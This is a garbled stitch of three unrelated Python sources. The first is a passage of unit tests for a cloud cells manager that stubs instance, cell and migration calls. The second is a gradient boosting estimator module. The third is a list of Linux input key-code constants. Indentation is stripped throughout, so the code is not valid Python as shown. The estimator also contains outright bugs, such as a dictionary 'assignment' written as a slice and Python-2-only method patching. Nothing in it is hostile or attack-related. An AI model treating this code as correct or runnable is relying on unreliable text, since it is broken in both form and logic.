def test_consoleauth_delete_tokens(self):
instance_uuid = 'fake-instance-uuid'
self.mox.StubOutWithMock(self.msg_runner,
'consoleauth_delete_tokens')
self.msg_runner.consoleauth_delete_tokens(self.ctxt, instance_uuid)
self.mox.ReplayAll()
self.cells_manager.consoleauth_delete_tokens(self.ctxt,
instance_uuid=instance_uuid)
def test_get_capacities(self):
cell_name = 'cell_name'
response = {"ram_free":
{"units_by_mb": {"64": 20, "128": 10}, "total_mb": 1491}}
self.mox.StubOutWithMock(self.state_manager,
'get_capacities')
self.state_manager.get_capacities(cell_name).AndReturn(response)
self.mox.ReplayAll()
self.assertEqual(response,
self.cells_manager.get_capacities(self.ctxt, cell_name))
def test_validate_console_port(self):
instance_uuid = 'fake-instance-uuid'
cell_name = 'fake-cell-name'
instance = {'cell_name': cell_name}
console_port = 'fake-console-port'
console_type = 'fake-console-type'
self.mox.StubOutWithMock(self.msg_runner,
'validate_console_port')
self.mox.StubOutWithMock(self.cells_manager.db,
'instance_get_by_uuid')
fake_response = self._get_fake_response()
self.cells_manager.db.instance_get_by_uuid(self.ctxt,
instance_uuid).AndReturn(instance)
self.msg_runner.validate_console_port(self.ctxt, cell_name,
instance_uuid, console_port,
console_type).AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.validate_console_port(self.ctxt,
instance_uuid=instance_uuid, console_port=console_port,
console_type=console_type)
self.assertEqual('fake-response', response)
def test_bdm_update_or_create_at_top(self):
self.mox.StubOutWithMock(self.msg_runner,
'bdm_update_or_create_at_top')
self.msg_runner.bdm_update_or_create_at_top(self.ctxt,
'fake-bdm',
create='foo')
self.mox.ReplayAll()
self.cells_manager.bdm_update_or_create_at_top(self.ctxt,
'fake-bdm',
create='foo')
def test_bdm_destroy_at_top(self):
self.mox.StubOutWithMock(self.msg_runner, 'bdm_destroy_at_top')
self.msg_runner.bdm_destroy_at_top(self.ctxt,
'fake_instance_uuid',
device_name='fake_device_name',
volume_id='fake_volume_id')
self.mox.ReplayAll()
self.cells_manager.bdm_destroy_at_top(self.ctxt,
'fake_instance_uuid',
device_name='fake_device_name',
volume_id='fake_volume_id')
def test_get_migrations(self):
filters = {'status': 'confirmed'}
cell1_migrations = [{'id': 123}]
cell2_migrations = [{'id': 456}]
fake_responses = [self._get_fake_response(cell1_migrations),
self._get_fake_response(cell2_migrations)]
self.mox.StubOutWithMock(self.msg_runner,
'get_migrations')
self.msg_runner.get_migrations(self.ctxt, None, False, filters).\
AndReturn(fake_responses)
self.mox.ReplayAll()
response = self.cells_manager.get_migrations(self.ctxt, filters)
self.assertEqual([cell1_migrations[0], cell2_migrations[0]], response)
def test_get_migrations_for_a_given_cell(self):
filters = {'status': 'confirmed', 'cell_name': 'ChildCell1'}
target_cell = '%s%s%s' % (CONF.cells.name, '!', filters['cell_name'])
migrations = [{'id': 123}]
fake_responses = [self._get_fake_response(migrations)]
self.mox.StubOutWithMock(self.msg_runner,
'get_migrations')
self.msg_runner.get_migrations(self.ctxt, target_cell, False,
filters).AndReturn(fake_responses)
self.mox.ReplayAll()
response = self.cells_manager.get_migrations(self.ctxt, filters)
self.assertEqual(migrations, response)
def test_instance_update_from_api(self):
self.mox.StubOutWithMock(self.msg_runner,
'instance_update_from_api')
self.msg_runner.instance_update_from_api(self.ctxt,
'fake-instance',
'exp_vm', 'exp_task',
'admin_reset')
self.mox.ReplayAll()
self.cells_manager.instance_update_from_api(
self.ctxt, instance='fake-instance',
expected_vm_state='exp_vm',
expected_task_state='exp_task',
admin_state_reset='admin_reset')
def test_start_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'start_instance')
self.msg_runner.start_instance(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.start_instance(self.ctxt, instance='fake-instance')
def test_stop_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'stop_instance')
self.msg_runner.stop_instance(self.ctxt, 'fake-instance',
do_cast='meow',
clean_shutdown='purr')
self.mox.ReplayAll()
self.cells_manager.stop_instance(self.ctxt,
instance='fake-instance',
do_cast='meow',
clean_shutdown='purr')
def test_cell_create(self):
values = 'values'
response = 'created_cell'
self.mox.StubOutWithMock(self.state_manager,
'cell_create')
self.state_manager.cell_create(self.ctxt, values).\
AndReturn(response)
self.mox.ReplayAll()
self.assertEqual(response,
self.cells_manager.cell_create(self.ctxt, values))
def test_cell_update(self):
cell_name = 'cell_name'
values = 'values'
response = 'updated_cell'
self.mox.StubOutWithMock(self.state_manager,
'cell_update')
self.state_manager.cell_update(self.ctxt, cell_name, values).\
AndReturn(response)
self.mox.ReplayAll()
self.assertEqual(response,
self.cells_manager.cell_update(self.ctxt, cell_name,
values))
def test_cell_delete(self):
cell_name = 'cell_name'
response = 1
self.mox.StubOutWithMock(self.state_manager,
'cell_delete')
self.state_manager.cell_delete(self.ctxt, cell_name).\
AndReturn(response)
self.mox.ReplayAll()
self.assertEqual(response,
self.cells_manager.cell_delete(self.ctxt, cell_name))
def test_cell_get(self):
cell_name = 'cell_name'
response = 'cell_info'
self.mox.StubOutWithMock(self.state_manager,
'cell_get')
self.state_manager.cell_get(self.ctxt, cell_name).\
AndReturn(response)
self.mox.ReplayAll()
self.assertEqual(response,
self.cells_manager.cell_get(self.ctxt, cell_name))
def test_reboot_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'reboot_instance')
self.msg_runner.reboot_instance(self.ctxt, 'fake-instance',
'HARD')
self.mox.ReplayAll()
self.cells_manager.reboot_instance(self.ctxt,
instance='fake-instance',
reboot_type='HARD')
def test_suspend_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'suspend_instance')
self.msg_runner.suspend_instance(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.suspend_instance(self.ctxt,
instance='fake-instance')
def test_resume_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'resume_instance')
self.msg_runner.resume_instance(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.resume_instance(self.ctxt,
instance='fake-instance')
def test_terminate_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'terminate_instance')
self.msg_runner.terminate_instance(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.terminate_instance(self.ctxt,
instance='fake-instance')
def test_soft_delete_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'soft_delete_instance')
self.msg_runner.soft_delete_instance(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.soft_delete_instance(self.ctxt,
instance='fake-instance')
def _test_resize_instance(self, clean_shutdown=True):
self.mox.StubOutWithMock(self.msg_runner, 'resize_instance')
self.msg_runner.resize_instance(self.ctxt, 'fake-instance',
'fake-flavor', 'fake-updates',
clean_shutdown=clean_shutdown)
self.mox.ReplayAll()
self.cells_manager.resize_instance(
self.ctxt, instance='fake-instance', flavor='fake-flavor',
extra_instance_updates='fake-updates',
clean_shutdown=clean_shutdown)
def test_resize_instance(self):
self._test_resize_instance()
def test_resize_instance_forced_shutdown(self):
self._test_resize_instance(clean_shutdown=False)
def test_live_migrate_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'live_migrate_instance')
self.msg_runner.live_migrate_instance(self.ctxt, 'fake-instance',
'fake-block', 'fake-commit',
'fake-host')
self.mox.ReplayAll()
self.cells_manager.live_migrate_instance(
self.ctxt, instance='fake-instance',
block_migration='fake-block', disk_over_commit='fake-commit',
host_name='fake-host')
def test_revert_resize(self):
self.mox.StubOutWithMock(self.msg_runner, 'revert_resize')
self.msg_runner.revert_resize(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.revert_resize(self.ctxt, instance='fake-instance')
def test_confirm_resize(self):
self.mox.StubOutWithMock(self.msg_runner, 'confirm_resize')
self.msg_runner.confirm_resize(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.confirm_resize(self.ctxt, instance='fake-instance')
def test_reset_network(self):
self.mox.StubOutWithMock(self.msg_runner, 'reset_network')
self.msg_runner.reset_network(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.reset_network(self.ctxt, instance='fake-instance')
def test_inject_network_info(self):
self.mox.StubOutWithMock(self.msg_runner, 'inject_network_info')
self.msg_runner.inject_network_info(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.inject_network_info(self.ctxt,
instance='fake-instance')
def test_snapshot_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'snapshot_instance')
self.msg_runner.snapshot_instance(self.ctxt, 'fake-instance',
'fake-id')
self.mox.ReplayAll()
self.cells_manager.snapshot_instance(self.ctxt,
instance='fake-instance',
image_id='fake-id')
def test_backup_instance(self):
self.mox.StubOutWithMock(self.msg_runner, 'backup_instance')
self.msg_runner.backup_instance(self.ctxt, 'fake-instance',
'fake-id', 'backup-type',
'rotation')
self.mox.ReplayAll()
self.cells_manager.backup_instance(self.ctxt,
instance='fake-instance',
image_id='fake-id',
backup_type='backup-type',
rotation='rotation')
def test_set_admin_password(self):
with mock.patch.object(self.msg_runner,
'set_admin_password') as set_admin_password:
self.cells_manager.set_admin_password(self.ctxt,
instance='fake-instance', new_pass='fake-password')
set_admin_password.assert_called_once_with(self.ctxt,
'fake-instance', 'fake-password')
| |
from .sklearntools import fit_predict, shrinkd, LinearCombination, BaseDelegatingEstimator, \
STSimpleEstimator, AlreadyFittedEstimator, growd
from sklearn.base import clone
from toolz.dicttoolz import valmap, dissoc
from .line_search import golden_section_search, zoom_search, zoom
import numpy as np
from sklearn.ensemble.gradient_boosting import RegressionLossFunction,\
QuantileEstimator, QuantileLossFunction, ExponentialLoss,\
ScaledLogOddsEstimator
from operator import __sub__, __lt__
from toolz.itertoolz import sliding_window
from itertools import starmap
from toolz.functoolz import flip, curry
from sklearn.exceptions import NotFittedError
from .sym.sym_predict import sym_predict
from .sym.sym_score_to_decision import sym_score_to_decision
from .sym.syms import syms
from .sym.sym_score_to_proba import sym_score_to_proba
from distutils.version import LooseVersion
import sklearn
from types import MethodType
from sklearn.linear_model.base import LinearRegression
from scipy.optimize.linesearch import line_search
import traceback
# Patch over bug in scikit learn (issue #9539)
if LooseVersion(sklearn.__version__) <= LooseVersion('0.18.2'):
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
diff = y - pred
alpha = self.alpha
mask = y > pred
if sample_weight is None:
loss = (alpha * diff[mask].sum() -
(1.0 - alpha) * diff[~mask].sum()) / y.shape[0]
else:
loss = ((alpha * np.sum(sample_weight[mask] * diff[mask]) -
(1.0 - alpha) * np.sum(sample_weight[~mask] * diff[~mask])) /
sample_weight.sum())
return loss
QuantileLossFunction.__call__ = MethodType(__call__, None, QuantileLossFunction)
if LooseVersion(sklearn.__version__) <= LooseVersion('0.19.1'):
# def __call__(self, y, pred, sample_weight=None):
# pred = pred.ravel()
# if sample_weight is None:
# return np.mean(np.exp(- y * pred))
# else:
# return (1.0 / sample_weight.sum() *
# np.sum(sample_weight * np.exp(- y * pred)))
def negative_gradient(self, y, pred, **kargs):
y_ = -(2. * y - 1.)
return - y_ * np.exp(y_ * pred.ravel())
try:
ExponentialLoss.negative_gradient = MethodType(negative_gradient, None, ExponentialLoss)
except TypeError:
ExponentialLoss.negative_gradient = negative_gradient
def log_one_plus_exp_x(x):
lower = -10.
upper = 35.
result = np.zeros_like(x)
low_idx = x < lower
result[low_idx] = np.exp(x[low_idx])
high_idx = x > upper
result[high_idx] = x[high_idx]
middle_idx = ~(low_idx | high_idx)
result[middle_idx] = np.log(1+np.exp(x[middle_idx]))
return result
def one_over_one_plus_exp_x(x):
lower = -100.
upper = 100.
result = np.zeros_like(x)
low_idx = x < lower
result[low_idx] = 1.
high_idx = x > upper
result[high_idx] = 0.
middle_idx = ~(low_idx | high_idx)
result[middle_idx] = 1. / (1. + np.exp(x[middle_idx]))
return result
class STExponentialLossFunction(object):
def init_estimator(self):
return ScaledLogOddsEstimator()
def __call__(self, y, pred, sample_weight=None):
print(y)
print(pred)
pred = pred.ravel()
if sample_weight is None:
return np.exp(- y * pred)
else:
return np.sum(sample_weight * np.exp(- y * pred))
def negative_gradient(self, y, pred, sample_weight=None, **kargs):
result = - y * np.exp(- y * pred.ravel())
if sample_weight is not None:
return sample_weight * result
return result
# y_ = -(2. * y - 1.)
# return y_ * np.exp(y_ * pred.ravel())
class SmoothQuantileLossFunction(RegressionLossFunction):
def __init__(self, n_classes, tau, alpha):
super(SmoothQuantileLossFunction, self).__init__(n_classes)
self.tau = tau
self.alpha = alpha
def init_estimator(self):
return QuantileEstimator(self.tau)
def __call__(self, y, pred, sample_weight=None):
x = y - pred
# n = float(y.shape[0])
if sample_weight is not None:
return np.dot(sample_weight, (self.tau * x + self.alpha * log_one_plus_exp_x(-(1./self.alpha)*x)))
else:
return np.sum(self.tau * x + self.alpha * log_one_plus_exp_x(-(1./self.alpha)*x))
def negative_gradient(self, y, pred, sample_weight=None):
x = y - pred
# n = float(y.shape[0])
if sample_weight is not None:
return sample_weight * (self.tau - one_over_one_plus_exp_x((1. / self.alpha) * x))
else:
return (self.tau - one_over_one_plus_exp_x((1. / self.alpha) * x))
def _update_terminal_region(self, *args, **kwargs):
raise NotImplementedError()
def never_stop_early(**kwargs):
return False
class NIterationsWithoutImprovementOverThreshold(object):
def __init__(self, stat, n, threshold=0.):
self.stat = stat
self.n = n
self.threshold = threshold
def __call__(self, losses, **kwargs):
if len(losses) <= self.n:
return False
return all(map(curry(__lt__)(-self.threshold), starmap(self.stat, sliding_window(2, losses[-(self.n+1):]))))
@curry
def stop_after_n_iterations_without_stat_improvement_over_threshold(stat, n, threshold=0.):
return NIterationsWithoutImprovementOverThreshold(stat, n, threshold)
# def _stop_after_n_iterations_without_improvement(losses, **kwargs):
# if len(losses) <= n:
# return False
# return all(map(curry(__lt__)(-threshold), starmap(stat, sliding_window(2, losses[-(n+1):]))))
# return _stop_after_n_iterations_without_improvement
def reduction(before, after):
return after - before
stop_after_n_iterations_without_improvement_over_threshold = stop_after_n_iterations_without_stat_improvement_over_threshold(flip(__sub__))
def percent_reduction(before, after):
return 100*(after - before) / float(before)
stop_after_n_iterations_without_percent_improvement_over_threshold = stop_after_n_iterations_without_stat_improvement_over_threshold(percent_reduction)
# class GradientDescentRegressor(STSimpleEstimator):
# def __init__(self, loss_function, initial_value=0.):
# self.loss_function = loss_function
#
# def fit(self, X, y, sample_weight=None):
# intercept = self.initial_value
# coef = np.zeros(X.shape[1])
# prediction = intercept + np.dot(X, coef)
# gradient_args = {'y':y, 'pred':prediction}
# while True:
# gradient = self.loss_function.negative_gradient(**valmap(shrinkd(1), gradient_args))
# linear_model = LinearRegression().fit(X, gradient)
# approx_gradient = linear_model.predict(X)
#
class GradientBoostingEstimator(BaseDelegatingEstimator):
def __init__(self, base_estimator, loss_function, learning_rate=.1, n_estimators=100,
stopper=never_stop_early, verbose=0, extra_fit=False):
self.base_estimator = base_estimator
self.loss_function = loss_function
self.learning_rate = learning_rate
self.n_estimators = n_estimators
self.stopper = stopper
self.verbose = verbose
self.extra_fit = extra_fit
def fit(self, X, y, sample_weight=None, exposure=None, previous_prediction=None):
fit_args = {'X': growd(2,X), 'y': shrinkd(1,y)}
if sample_weight is not None:
fit_args['sample_weight'] = shrinkd(1, sample_weight)
if exposure is not None:
fit_args['exposure'] = shrinkd(1, exposure)
# self._process_args(X=X, y=y, sample_weight=sample_weight,
# exposure=exposure)
if self._estimator_type == 'classifier':
self.classes_, y = np.unique(growd(2,y), return_inverse=True)
else:
self.y = growd(2,y)
coefficients = []
estimators = []
if previous_prediction is None:
initial_estimator = self.loss_function.init_estimator()
initial_estimator.fit(**fit_args)
coefficients.append(1.)
estimators.append(initial_estimator)
predict_args = {'X':X}
if exposure is not None:
predict_args['exposure'] = exposure
if previous_prediction is None:
prediction = shrinkd(1, initial_estimator.predict(**valmap(shrinkd(1), predict_args)))
else:
prediction = previous_prediction.copy()
# prediction_cv = prediction.copy()
gradient_args = {'y':y, 'pred':prediction}
if sample_weight is not None:
gradient_args['sample_weight': sample_weight]
if exposure is not None:
gradient_args['exposure': exposure]
gradient = shrinkd(1, self.loss_function.negative_gradient(**valmap(shrinkd(1), gradient_args)))
partial_arguments = {'y':y}
if sample_weight is not None:
partial_arguments['sample_weight'] = sample_weight
if exposure is not None:
partial_arguments['exposure'] = exposure
loss_function = lambda pred: self.loss_function(pred=shrinkd(1, pred), **valmap(shrinkd(1), partial_arguments))
self.initial_loss_ = loss_function(prediction)
loss = self.initial_loss_
# loss_cv = loss
losses = [self.initial_loss_]
# losses_cv = [self.initial_loss_]
predict_args = {'X': X}
if exposure is not None:
predict_args['exposure'] = shrinkd(1, exposure)
self.early_stop_ = False
for iteration in range(self.n_estimators):
previous_loss = loss
# previous_loss_cv = loss_cv
if self.verbose >= 1:
print('Fitting estimator %d...' % (iteration + 1))
fit_args['y'] = shrinkd(1, gradient)
estimator = clone(self.base_estimator)
try:
approx_gradient = shrinkd(1, fit_predict(estimator, **fit_args))
except:
raise
if self.verbose >= 1:
print('Fitting for estimator %d complete.' % (iteration + 1))
# approx_gradient = estimator.predict(**predict_args)
# prediction_cv += alpha * approx_gradient_cv
# loss_cv = loss_function(prediction_cv)
if self.extra_fit:
transform_args = {'X': X}
if exposure is not None:
transform_args['exposure'] = exposure
extra_fit_args = {'X': estimator.transform(**transform_args), 'y': y, 'previous_prediction': prediction}
if sample_weight is not None:
extra_fit_args['sample_weight'] = sample_weight
extra_predict_args = dissoc(extra_fit_args, 'y', 'previous_prediction')
extra_estimator = GradientBoostingEstimator(LinearRegression(), loss_function=self.loss_function,
stopper=stop_after_n_iterations_without_percent_improvement_over_threshold(1, .001))
extra_estimator.fit(**valmap(shrinkd(1), extra_fit_args))
prediction += extra_estimator.decision_function(**extra_predict_args)
loss = loss_function(prediction)
coefficients.append(1.)
estimators.append((AlreadyFittedEstimator(estimator) >> AlreadyFittedEstimator(extra_estimator)).fit(X,y))
losses.append(loss)
else:
# loss_grad = lambda pred: -self.loss_function.negative_gradient(pred=pred, **valmap(shrinkd(1), partial_arguments))
if self.verbose >= 1:
print('Computing alpha for estimator %d...' % (iteration + 1))
# alpha, _, _, _, _, _ = line_search(loss_function, loss_grad, shrinkd(1, prediction), shrinkd(1,gradient))
alpha = zoom_search(golden_section_search(1e-16), zoom(1., 20, 2.), loss_function, prediction, approx_gradient)
alpha *= self.learning_rate
if self.verbose >= 1:
print('alpha = %f' % alpha)
if self.verbose >= 1:
print('Computing alpha for estimator %d complete.' % (iteration + 1))
prediction += alpha * approx_gradient
loss = loss_function(prediction)
coefficients.append(alpha)
estimators.append(estimator)
losses.append(loss)
# losses_cv.append(loss_cv)
if self.verbose >= 1:
print('Loss after %d iterations is %f, a reduction of %f%%.' % (iteration + 1, loss, 100*(previous_loss - loss)/float(previous_loss)))
# if loss_cv != loss:
# print('Cross-validated loss after %d iterations is %f, a reduction of %f%%.' % (iteration + 1, loss_cv, 100*(previous_loss_cv - loss_cv)/float(previous_loss_cv)))
print('Checking early stopping condition for estimator %d...' % (iteration + 1))
if self.stopper(iteration=iteration, coefficients=coefficients, losses=losses,
gradient=gradient, approx_gradient=approx_gradient):#, approx_gradient_cv=approx_gradient_cv):
self.early_stop_ = True
if self.verbose >= 1:
print('Stopping early after %d iterations.' % (iteration + 1))
break
if self.verbose >= 1:
print('Not stopping early.')
gradient_args['pred'] = prediction
gradient = shrinkd(1, self.loss_function.negative_gradient(**valmap(shrinkd(1), gradient_args)))
self.coefficients_ = coefficients
self.estimators_ = estimators
self.losses_ = losses
# self.losses_cv_ = losses_cv
self.score_ = (self.initial_loss_ - loss) / self.initial_loss_
self.estimator_ = LinearCombination(self.estimators_, self.coefficients_)
self._create_delegates('estimator', ['syms'])
return self
def statistic_over_steps(self, X, y, statistic, exposure=None):
result = []
predict_args = {'X': X}
if exposure is not None:
predict_args['exposure'] = exposure
for j in range(1, len(self.estimators_)+1):
model = LinearCombination(self.estimators_[:j], self.coefficients_[:j])
pred = model.predict(X)
result.append(statistic(y, pred))
return result
def score(self, X, y, sample_weight=None, exposure=None):
partial_arguments = self._process_args(y=y, sample_weight=sample_weight, exposure=exposure)
predict_arguments = self._process_args(X=X, exposure=exposure)
loss_function = lambda pred: self.loss_function(pred=shrinkd(1, pred), **valmap(shrinkd(1), partial_arguments))
prediction = shrinkd(1, self.predict(**predict_arguments))
loss = loss_function(prediction)
initial_prediction = shrinkd(1, self.coefficients_[0] * self.estimators_[0].predict(**predict_arguments))
initial_loss = loss_function(initial_prediction)
return (initial_loss - loss) / initial_loss
def transform(self, X, exposure=None):
if not hasattr(self, 'estimator_'):
raise NotFittedError()
args = self._process_args(X=X, exposure=exposure)
return np.concatenate([est.transform(**args) for est in self.estimators_[1:]], axis=1)
def predict(self, X, exposure=None):
if not hasattr(self, 'estimator_'):
raise NotFittedError()
pred_args = self._process_args(X=X, exposure=exposure)
score = self.estimator_.predict(**pred_args)
if hasattr(self.loss_function, '_score_to_decision'):
return self.loss_function._score_to_decision(score)
else:
return score
def sym_predict(self):
if not hasattr(self, 'estimator_'):
raise NotFittedError()
inner = sym_predict(self.estimator_)
if hasattr(self.loss_function, '_score_to_decision'):
outer = sym_score_to_decision(self.loss_function)
variable = syms(self.loss_function)[0]
return outer.subs({variable: inner})
else:
return inner
def predict_proba(self, X, exposure=None):
if not hasattr(self, 'estimator_'):
raise NotFittedError()
if hasattr(self.loss_function, '_score_to_proba'):
pred_args = self._process_args(X=X, exposure=exposure)
score = self.estimator_.predict(**pred_args)
return self.loss_function._score_to_proba(score)
else:
raise AttributeError()
def sym_predict_proba(self):
if not hasattr(self, 'estimator_'):
raise NotFittedError()
inner = sym_predict(self.estimator_)
if hasattr(self.loss_function, '_score_to_proba'):
outer = sym_score_to_proba(self.loss_function)
variable = syms(self.loss_function)[0]
return outer.subs({variable: inner})
else:
return inner
def decision_function(self, X, exposure=None):
if not hasattr(self.loss_function, '_score_to_decision'):
raise AttributeError()
if not hasattr(self, 'estimator_'):
raise NotFittedError()
pred_args = self._process_args(X=X, exposure=exposure)
score = self.estimator_.predict(**pred_args)
return score
def sym_decision_function(self):
if not hasattr(self.loss_function, '_score_to_decision'):
raise AttributeError()
if not hasattr(self, 'estimator_'):
raise NotFittedError()
return sym_predict(self.estimator_)
@property
def _estimator_type(self):
if hasattr(self.loss_function, '_score_to_decision'):
return 'classifier'
else:
return 'regressor'
| |
#
# scancodes, ripped straight from /usr/include/linux/input.h
#
EV_VERSION = 0x010000
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_SW = 0x05
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
EV_CNT = (EV_MAX+1)
SYN_REPORT = 0
SYN_CONFIG = 1
SYN_MT_REPORT = 2
KEY_RESERVED = 0
KEY_ESC = 1
KEY_1 = 2
KEY_2 = 3
KEY_3 = 4
KEY_4 = 5
KEY_5 = 6
KEY_6 = 7
KEY_7 = 8
KEY_8 = 9
KEY_9 = 10
KEY_0 = 11
KEY_MINUS = 12
KEY_EQUAL = 13
KEY_BACKSPACE = 14
KEY_TAB = 15
KEY_Q = 16
KEY_W = 17
KEY_E = 18
KEY_R = 19
KEY_T = 20
KEY_Y = 21
KEY_U = 22
KEY_I = 23
KEY_O = 24
KEY_P = 25
KEY_LEFTBRACE = 26
KEY_RIGHTBRACE = 27
KEY_ENTER = 28
KEY_LEFTCTRL = 29
KEY_A = 30
KEY_S = 31
KEY_D = 32
KEY_F = 33
KEY_G = 34
KEY_H = 35
KEY_J = 36
KEY_K = 37
KEY_L = 38
KEY_SEMICOLON = 39
KEY_APOSTROPHE = 40
KEY_GRAVE = 41
KEY_LEFTSHIFT = 42
KEY_BACKSLASH = 43
KEY_Z = 44
KEY_X = 45
KEY_C = 46
KEY_V = 47
KEY_B = 48
KEY_N = 49
KEY_M = 50
KEY_COMMA = 51
KEY_DOT = 52
KEY_SLASH = 53
KEY_RIGHTSHIFT = 54
KEY_KPASTERISK = 55
KEY_LEFTALT = 56
KEY_SPACE = 57
KEY_CAPSLOCK = 58
KEY_F1 = 59
KEY_F2 = 60
KEY_F3 = 61
KEY_F4 = 62
KEY_F5 = 63
KEY_F6 = 64
KEY_F7 = 65
KEY_F8 = 66
KEY_F9 = 67
KEY_F10 = 68
KEY_NUMLOCK = 69
KEY_SCROLLLOCK = 70
KEY_KP7 = 71
KEY_KP8 = 72
KEY_KP9 = 73
KEY_KPMINUS = 74
KEY_KP4 = 75
KEY_KP5 = 76
KEY_KP6 = 77
KEY_KPPLUS = 78
KEY_KP1 = 79
KEY_KP2 = 80
KEY_KP3 = 81
KEY_KP0 = 82
KEY_KPDOT = 83
KEY_ZENKAKUHANKAKU = 85
KEY_102ND = 86
KEY_F11 = 87
KEY_F12 = 88
KEY_RO = 89
KEY_KATAKANA = 90
KEY_HIRAGANA = 91
KEY_HENKAN = 92
KEY_KATAKANAHIRAGANA = 93
KEY_MUHENKAN = 94
KEY_KPJPCOMMA = 95
KEY_KPENTER = 96
KEY_RIGHTCTRL = 97
KEY_KPSLASH = 98
KEY_SYSRQ = 99
KEY_RIGHTALT = 100
KEY_LINEFEED = 101
KEY_HOME = 102
KEY_UP = 103
KEY_PAGEUP = 104
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_END = 107
KEY_DOWN = 108
KEY_PAGEDOWN = 109
KEY_INSERT = 110
KEY_DELETE = 111
KEY_MACRO = 112
KEY_MUTE = 113
KEY_VOLUMEDOWN = 114
KEY_VOLUMEUP = 115
KEY_POWER = 116 # SC System Power Down
KEY_KPEQUAL = 117
KEY_KPPLUSMINUS = 118
KEY_PAUSE = 119
KEY_SCALE = 120 # AL Compiz Scale (Expose)
KEY_KPCOMMA = 121
KEY_HANGEUL = 122
KEY_HANGUEL = KEY_HANGEUL
KEY_HANJA = 123
KEY_YEN = 124
KEY_LEFTMETA = 125
KEY_RIGHTMETA = 126
KEY_COMPOSE = 127
KEY_STOP = 128 # AC Stop
KEY_AGAIN = 129
KEY_PROPS = 130 # AC Properties
KEY_UNDO = 131 # AC Undo
KEY_FRONT = 132
KEY_COPY = 133 # AC Copy
KEY_OPEN = 134 # AC Open
KEY_PASTE = 135 # AC Paste
KEY_FIND = 136 # AC Search
KEY_CUT = 137 # AC Cut
KEY_HELP = 138 # AL Integrated Help Center
KEY_MENU = 139 # Menu (show menu)
KEY_CALC = 140 # AL Calculator
KEY_SETUP = 141
KEY_SLEEP = 142 # SC System Sleep
KEY_WAKEUP = 143 # System Wake Up
KEY_FILE = 144 # AL Local Machine Browser
KEY_SENDFILE = 145
KEY_DELETEFILE = 146
KEY_XFER = 147
KEY_PROG1 = 148
KEY_PROG2 = 149
KEY_WWW = 150 # AL Internet Browser
KEY_MSDOS = 151
KEY_COFFEE = 152 # AL Terminal Lock/Screensaver
KEY_SCREENLOCK = KEY_COFFEE
KEY_DIRECTION = 153
KEY_CYCLEWINDOWS = 154
KEY_MAIL = 155
KEY_BOOKMARKS = 156 # AC Bookmarks
KEY_COMPUTER = 157
KEY_BACK = 158 # AC Back
KEY_FORWARD = 159 # AC Forward
KEY_CLOSECD = 160
KEY_EJECTCD = 161
KEY_EJECTCLOSECD = 162
KEY_NEXTSONG = 163
KEY_PLAYPAUSE = 164
KEY_PREVIOUSSONG = 165
KEY_STOPCD = 166
KEY_RECORD = 167
KEY_REWIND = 168
KEY_PHONE = 169 # Media Select Telephone
KEY_ISO = 170
KEY_CONFIG = 171 # AL Consumer Control Configuration
KEY_HOMEPAGE = 172 # AC Home
KEY_REFRESH = 173 # AC Refresh
KEY_EXIT = 174 # AC Exit
KEY_MOVE = 175
KEY_EDIT = 176
KEY_SCROLLUP = 177
KEY_SCROLLDOWN = 178
KEY_KPLEFTPAREN = 179
KEY_KPRIGHTPAREN = 180
KEY_NEW = 181 # AC New
KEY_REDO = 182 # AC Redo/Repeat
KEY_F13 = 183
KEY_F14 = 184
KEY_F15 = 185
KEY_F16 = 186
KEY_F17 = 187
KEY_F18 = 188
KEY_F19 = 189
KEY_F20 = 190
KEY_F21 = 191
KEY_F22 = 192
KEY_F23 = 193
KEY_F24 = 194
KEY_PLAYCD = 200
KEY_PAUSECD = 201
KEY_PROG3 = 202
KEY_PROG4 = 203
KEY_DASHBOARD = 204 # AL Dashboard
KEY_SUSPEND = 205
KEY_CLOSE = 206 # AC Close
KEY_PLAY = 207
KEY_FASTFORWARD = 208
KEY_BASSBOOST = 209
KEY_PRINT = 210 # AC Print
KEY_HP = 211
KEY_CAMERA = 212
KEY_SOUND = 213
KEY_QUESTION = 214
KEY_EMAIL = 215
KEY_CHAT = 216
KEY_SEARCH = 217
KEY_CONNECT = 218
KEY_FINANCE = 219 # AL Checkbook/Finance
KEY_SPORT = 220
KEY_SHOP = 221
KEY_ALTERASE = 222
KEY_CANCEL = 223 # AC Cancel
KEY_BRIGHTNESSDOWN = 224
KEY_BRIGHTNESSUP = 225
KEY_MEDIA = 226
KEY_SWITCHVIDEOMODE = 227 # Cycle between available video
KEY_KBDILLUMTOGGLE = 228
KEY_KBDILLUMDOWN = 229
KEY_KBDILLUMUP = 230
KEY_SEND = 231 # AC Send
KEY_REPLY = 232 # AC Reply
KEY_FORWARDMAIL = 233 # AC Forward Msg
KEY_SAVE = 234 # AC Save
KEY_DOCUMENTS = 235
KEY_BATTERY = 236
KEY_BLUETOOTH = 237
KEY_WLAN = 238
KEY_UWB = 239
KEY_UNKNOWN = 240
KEY_VIDEO_NEXT = 241 # drive next video source
KEY_VIDEO_PREV = 242 # drive previous video source
KEY_BRIGHTNESS_CYCLE = 243 # brightness up, after max is min
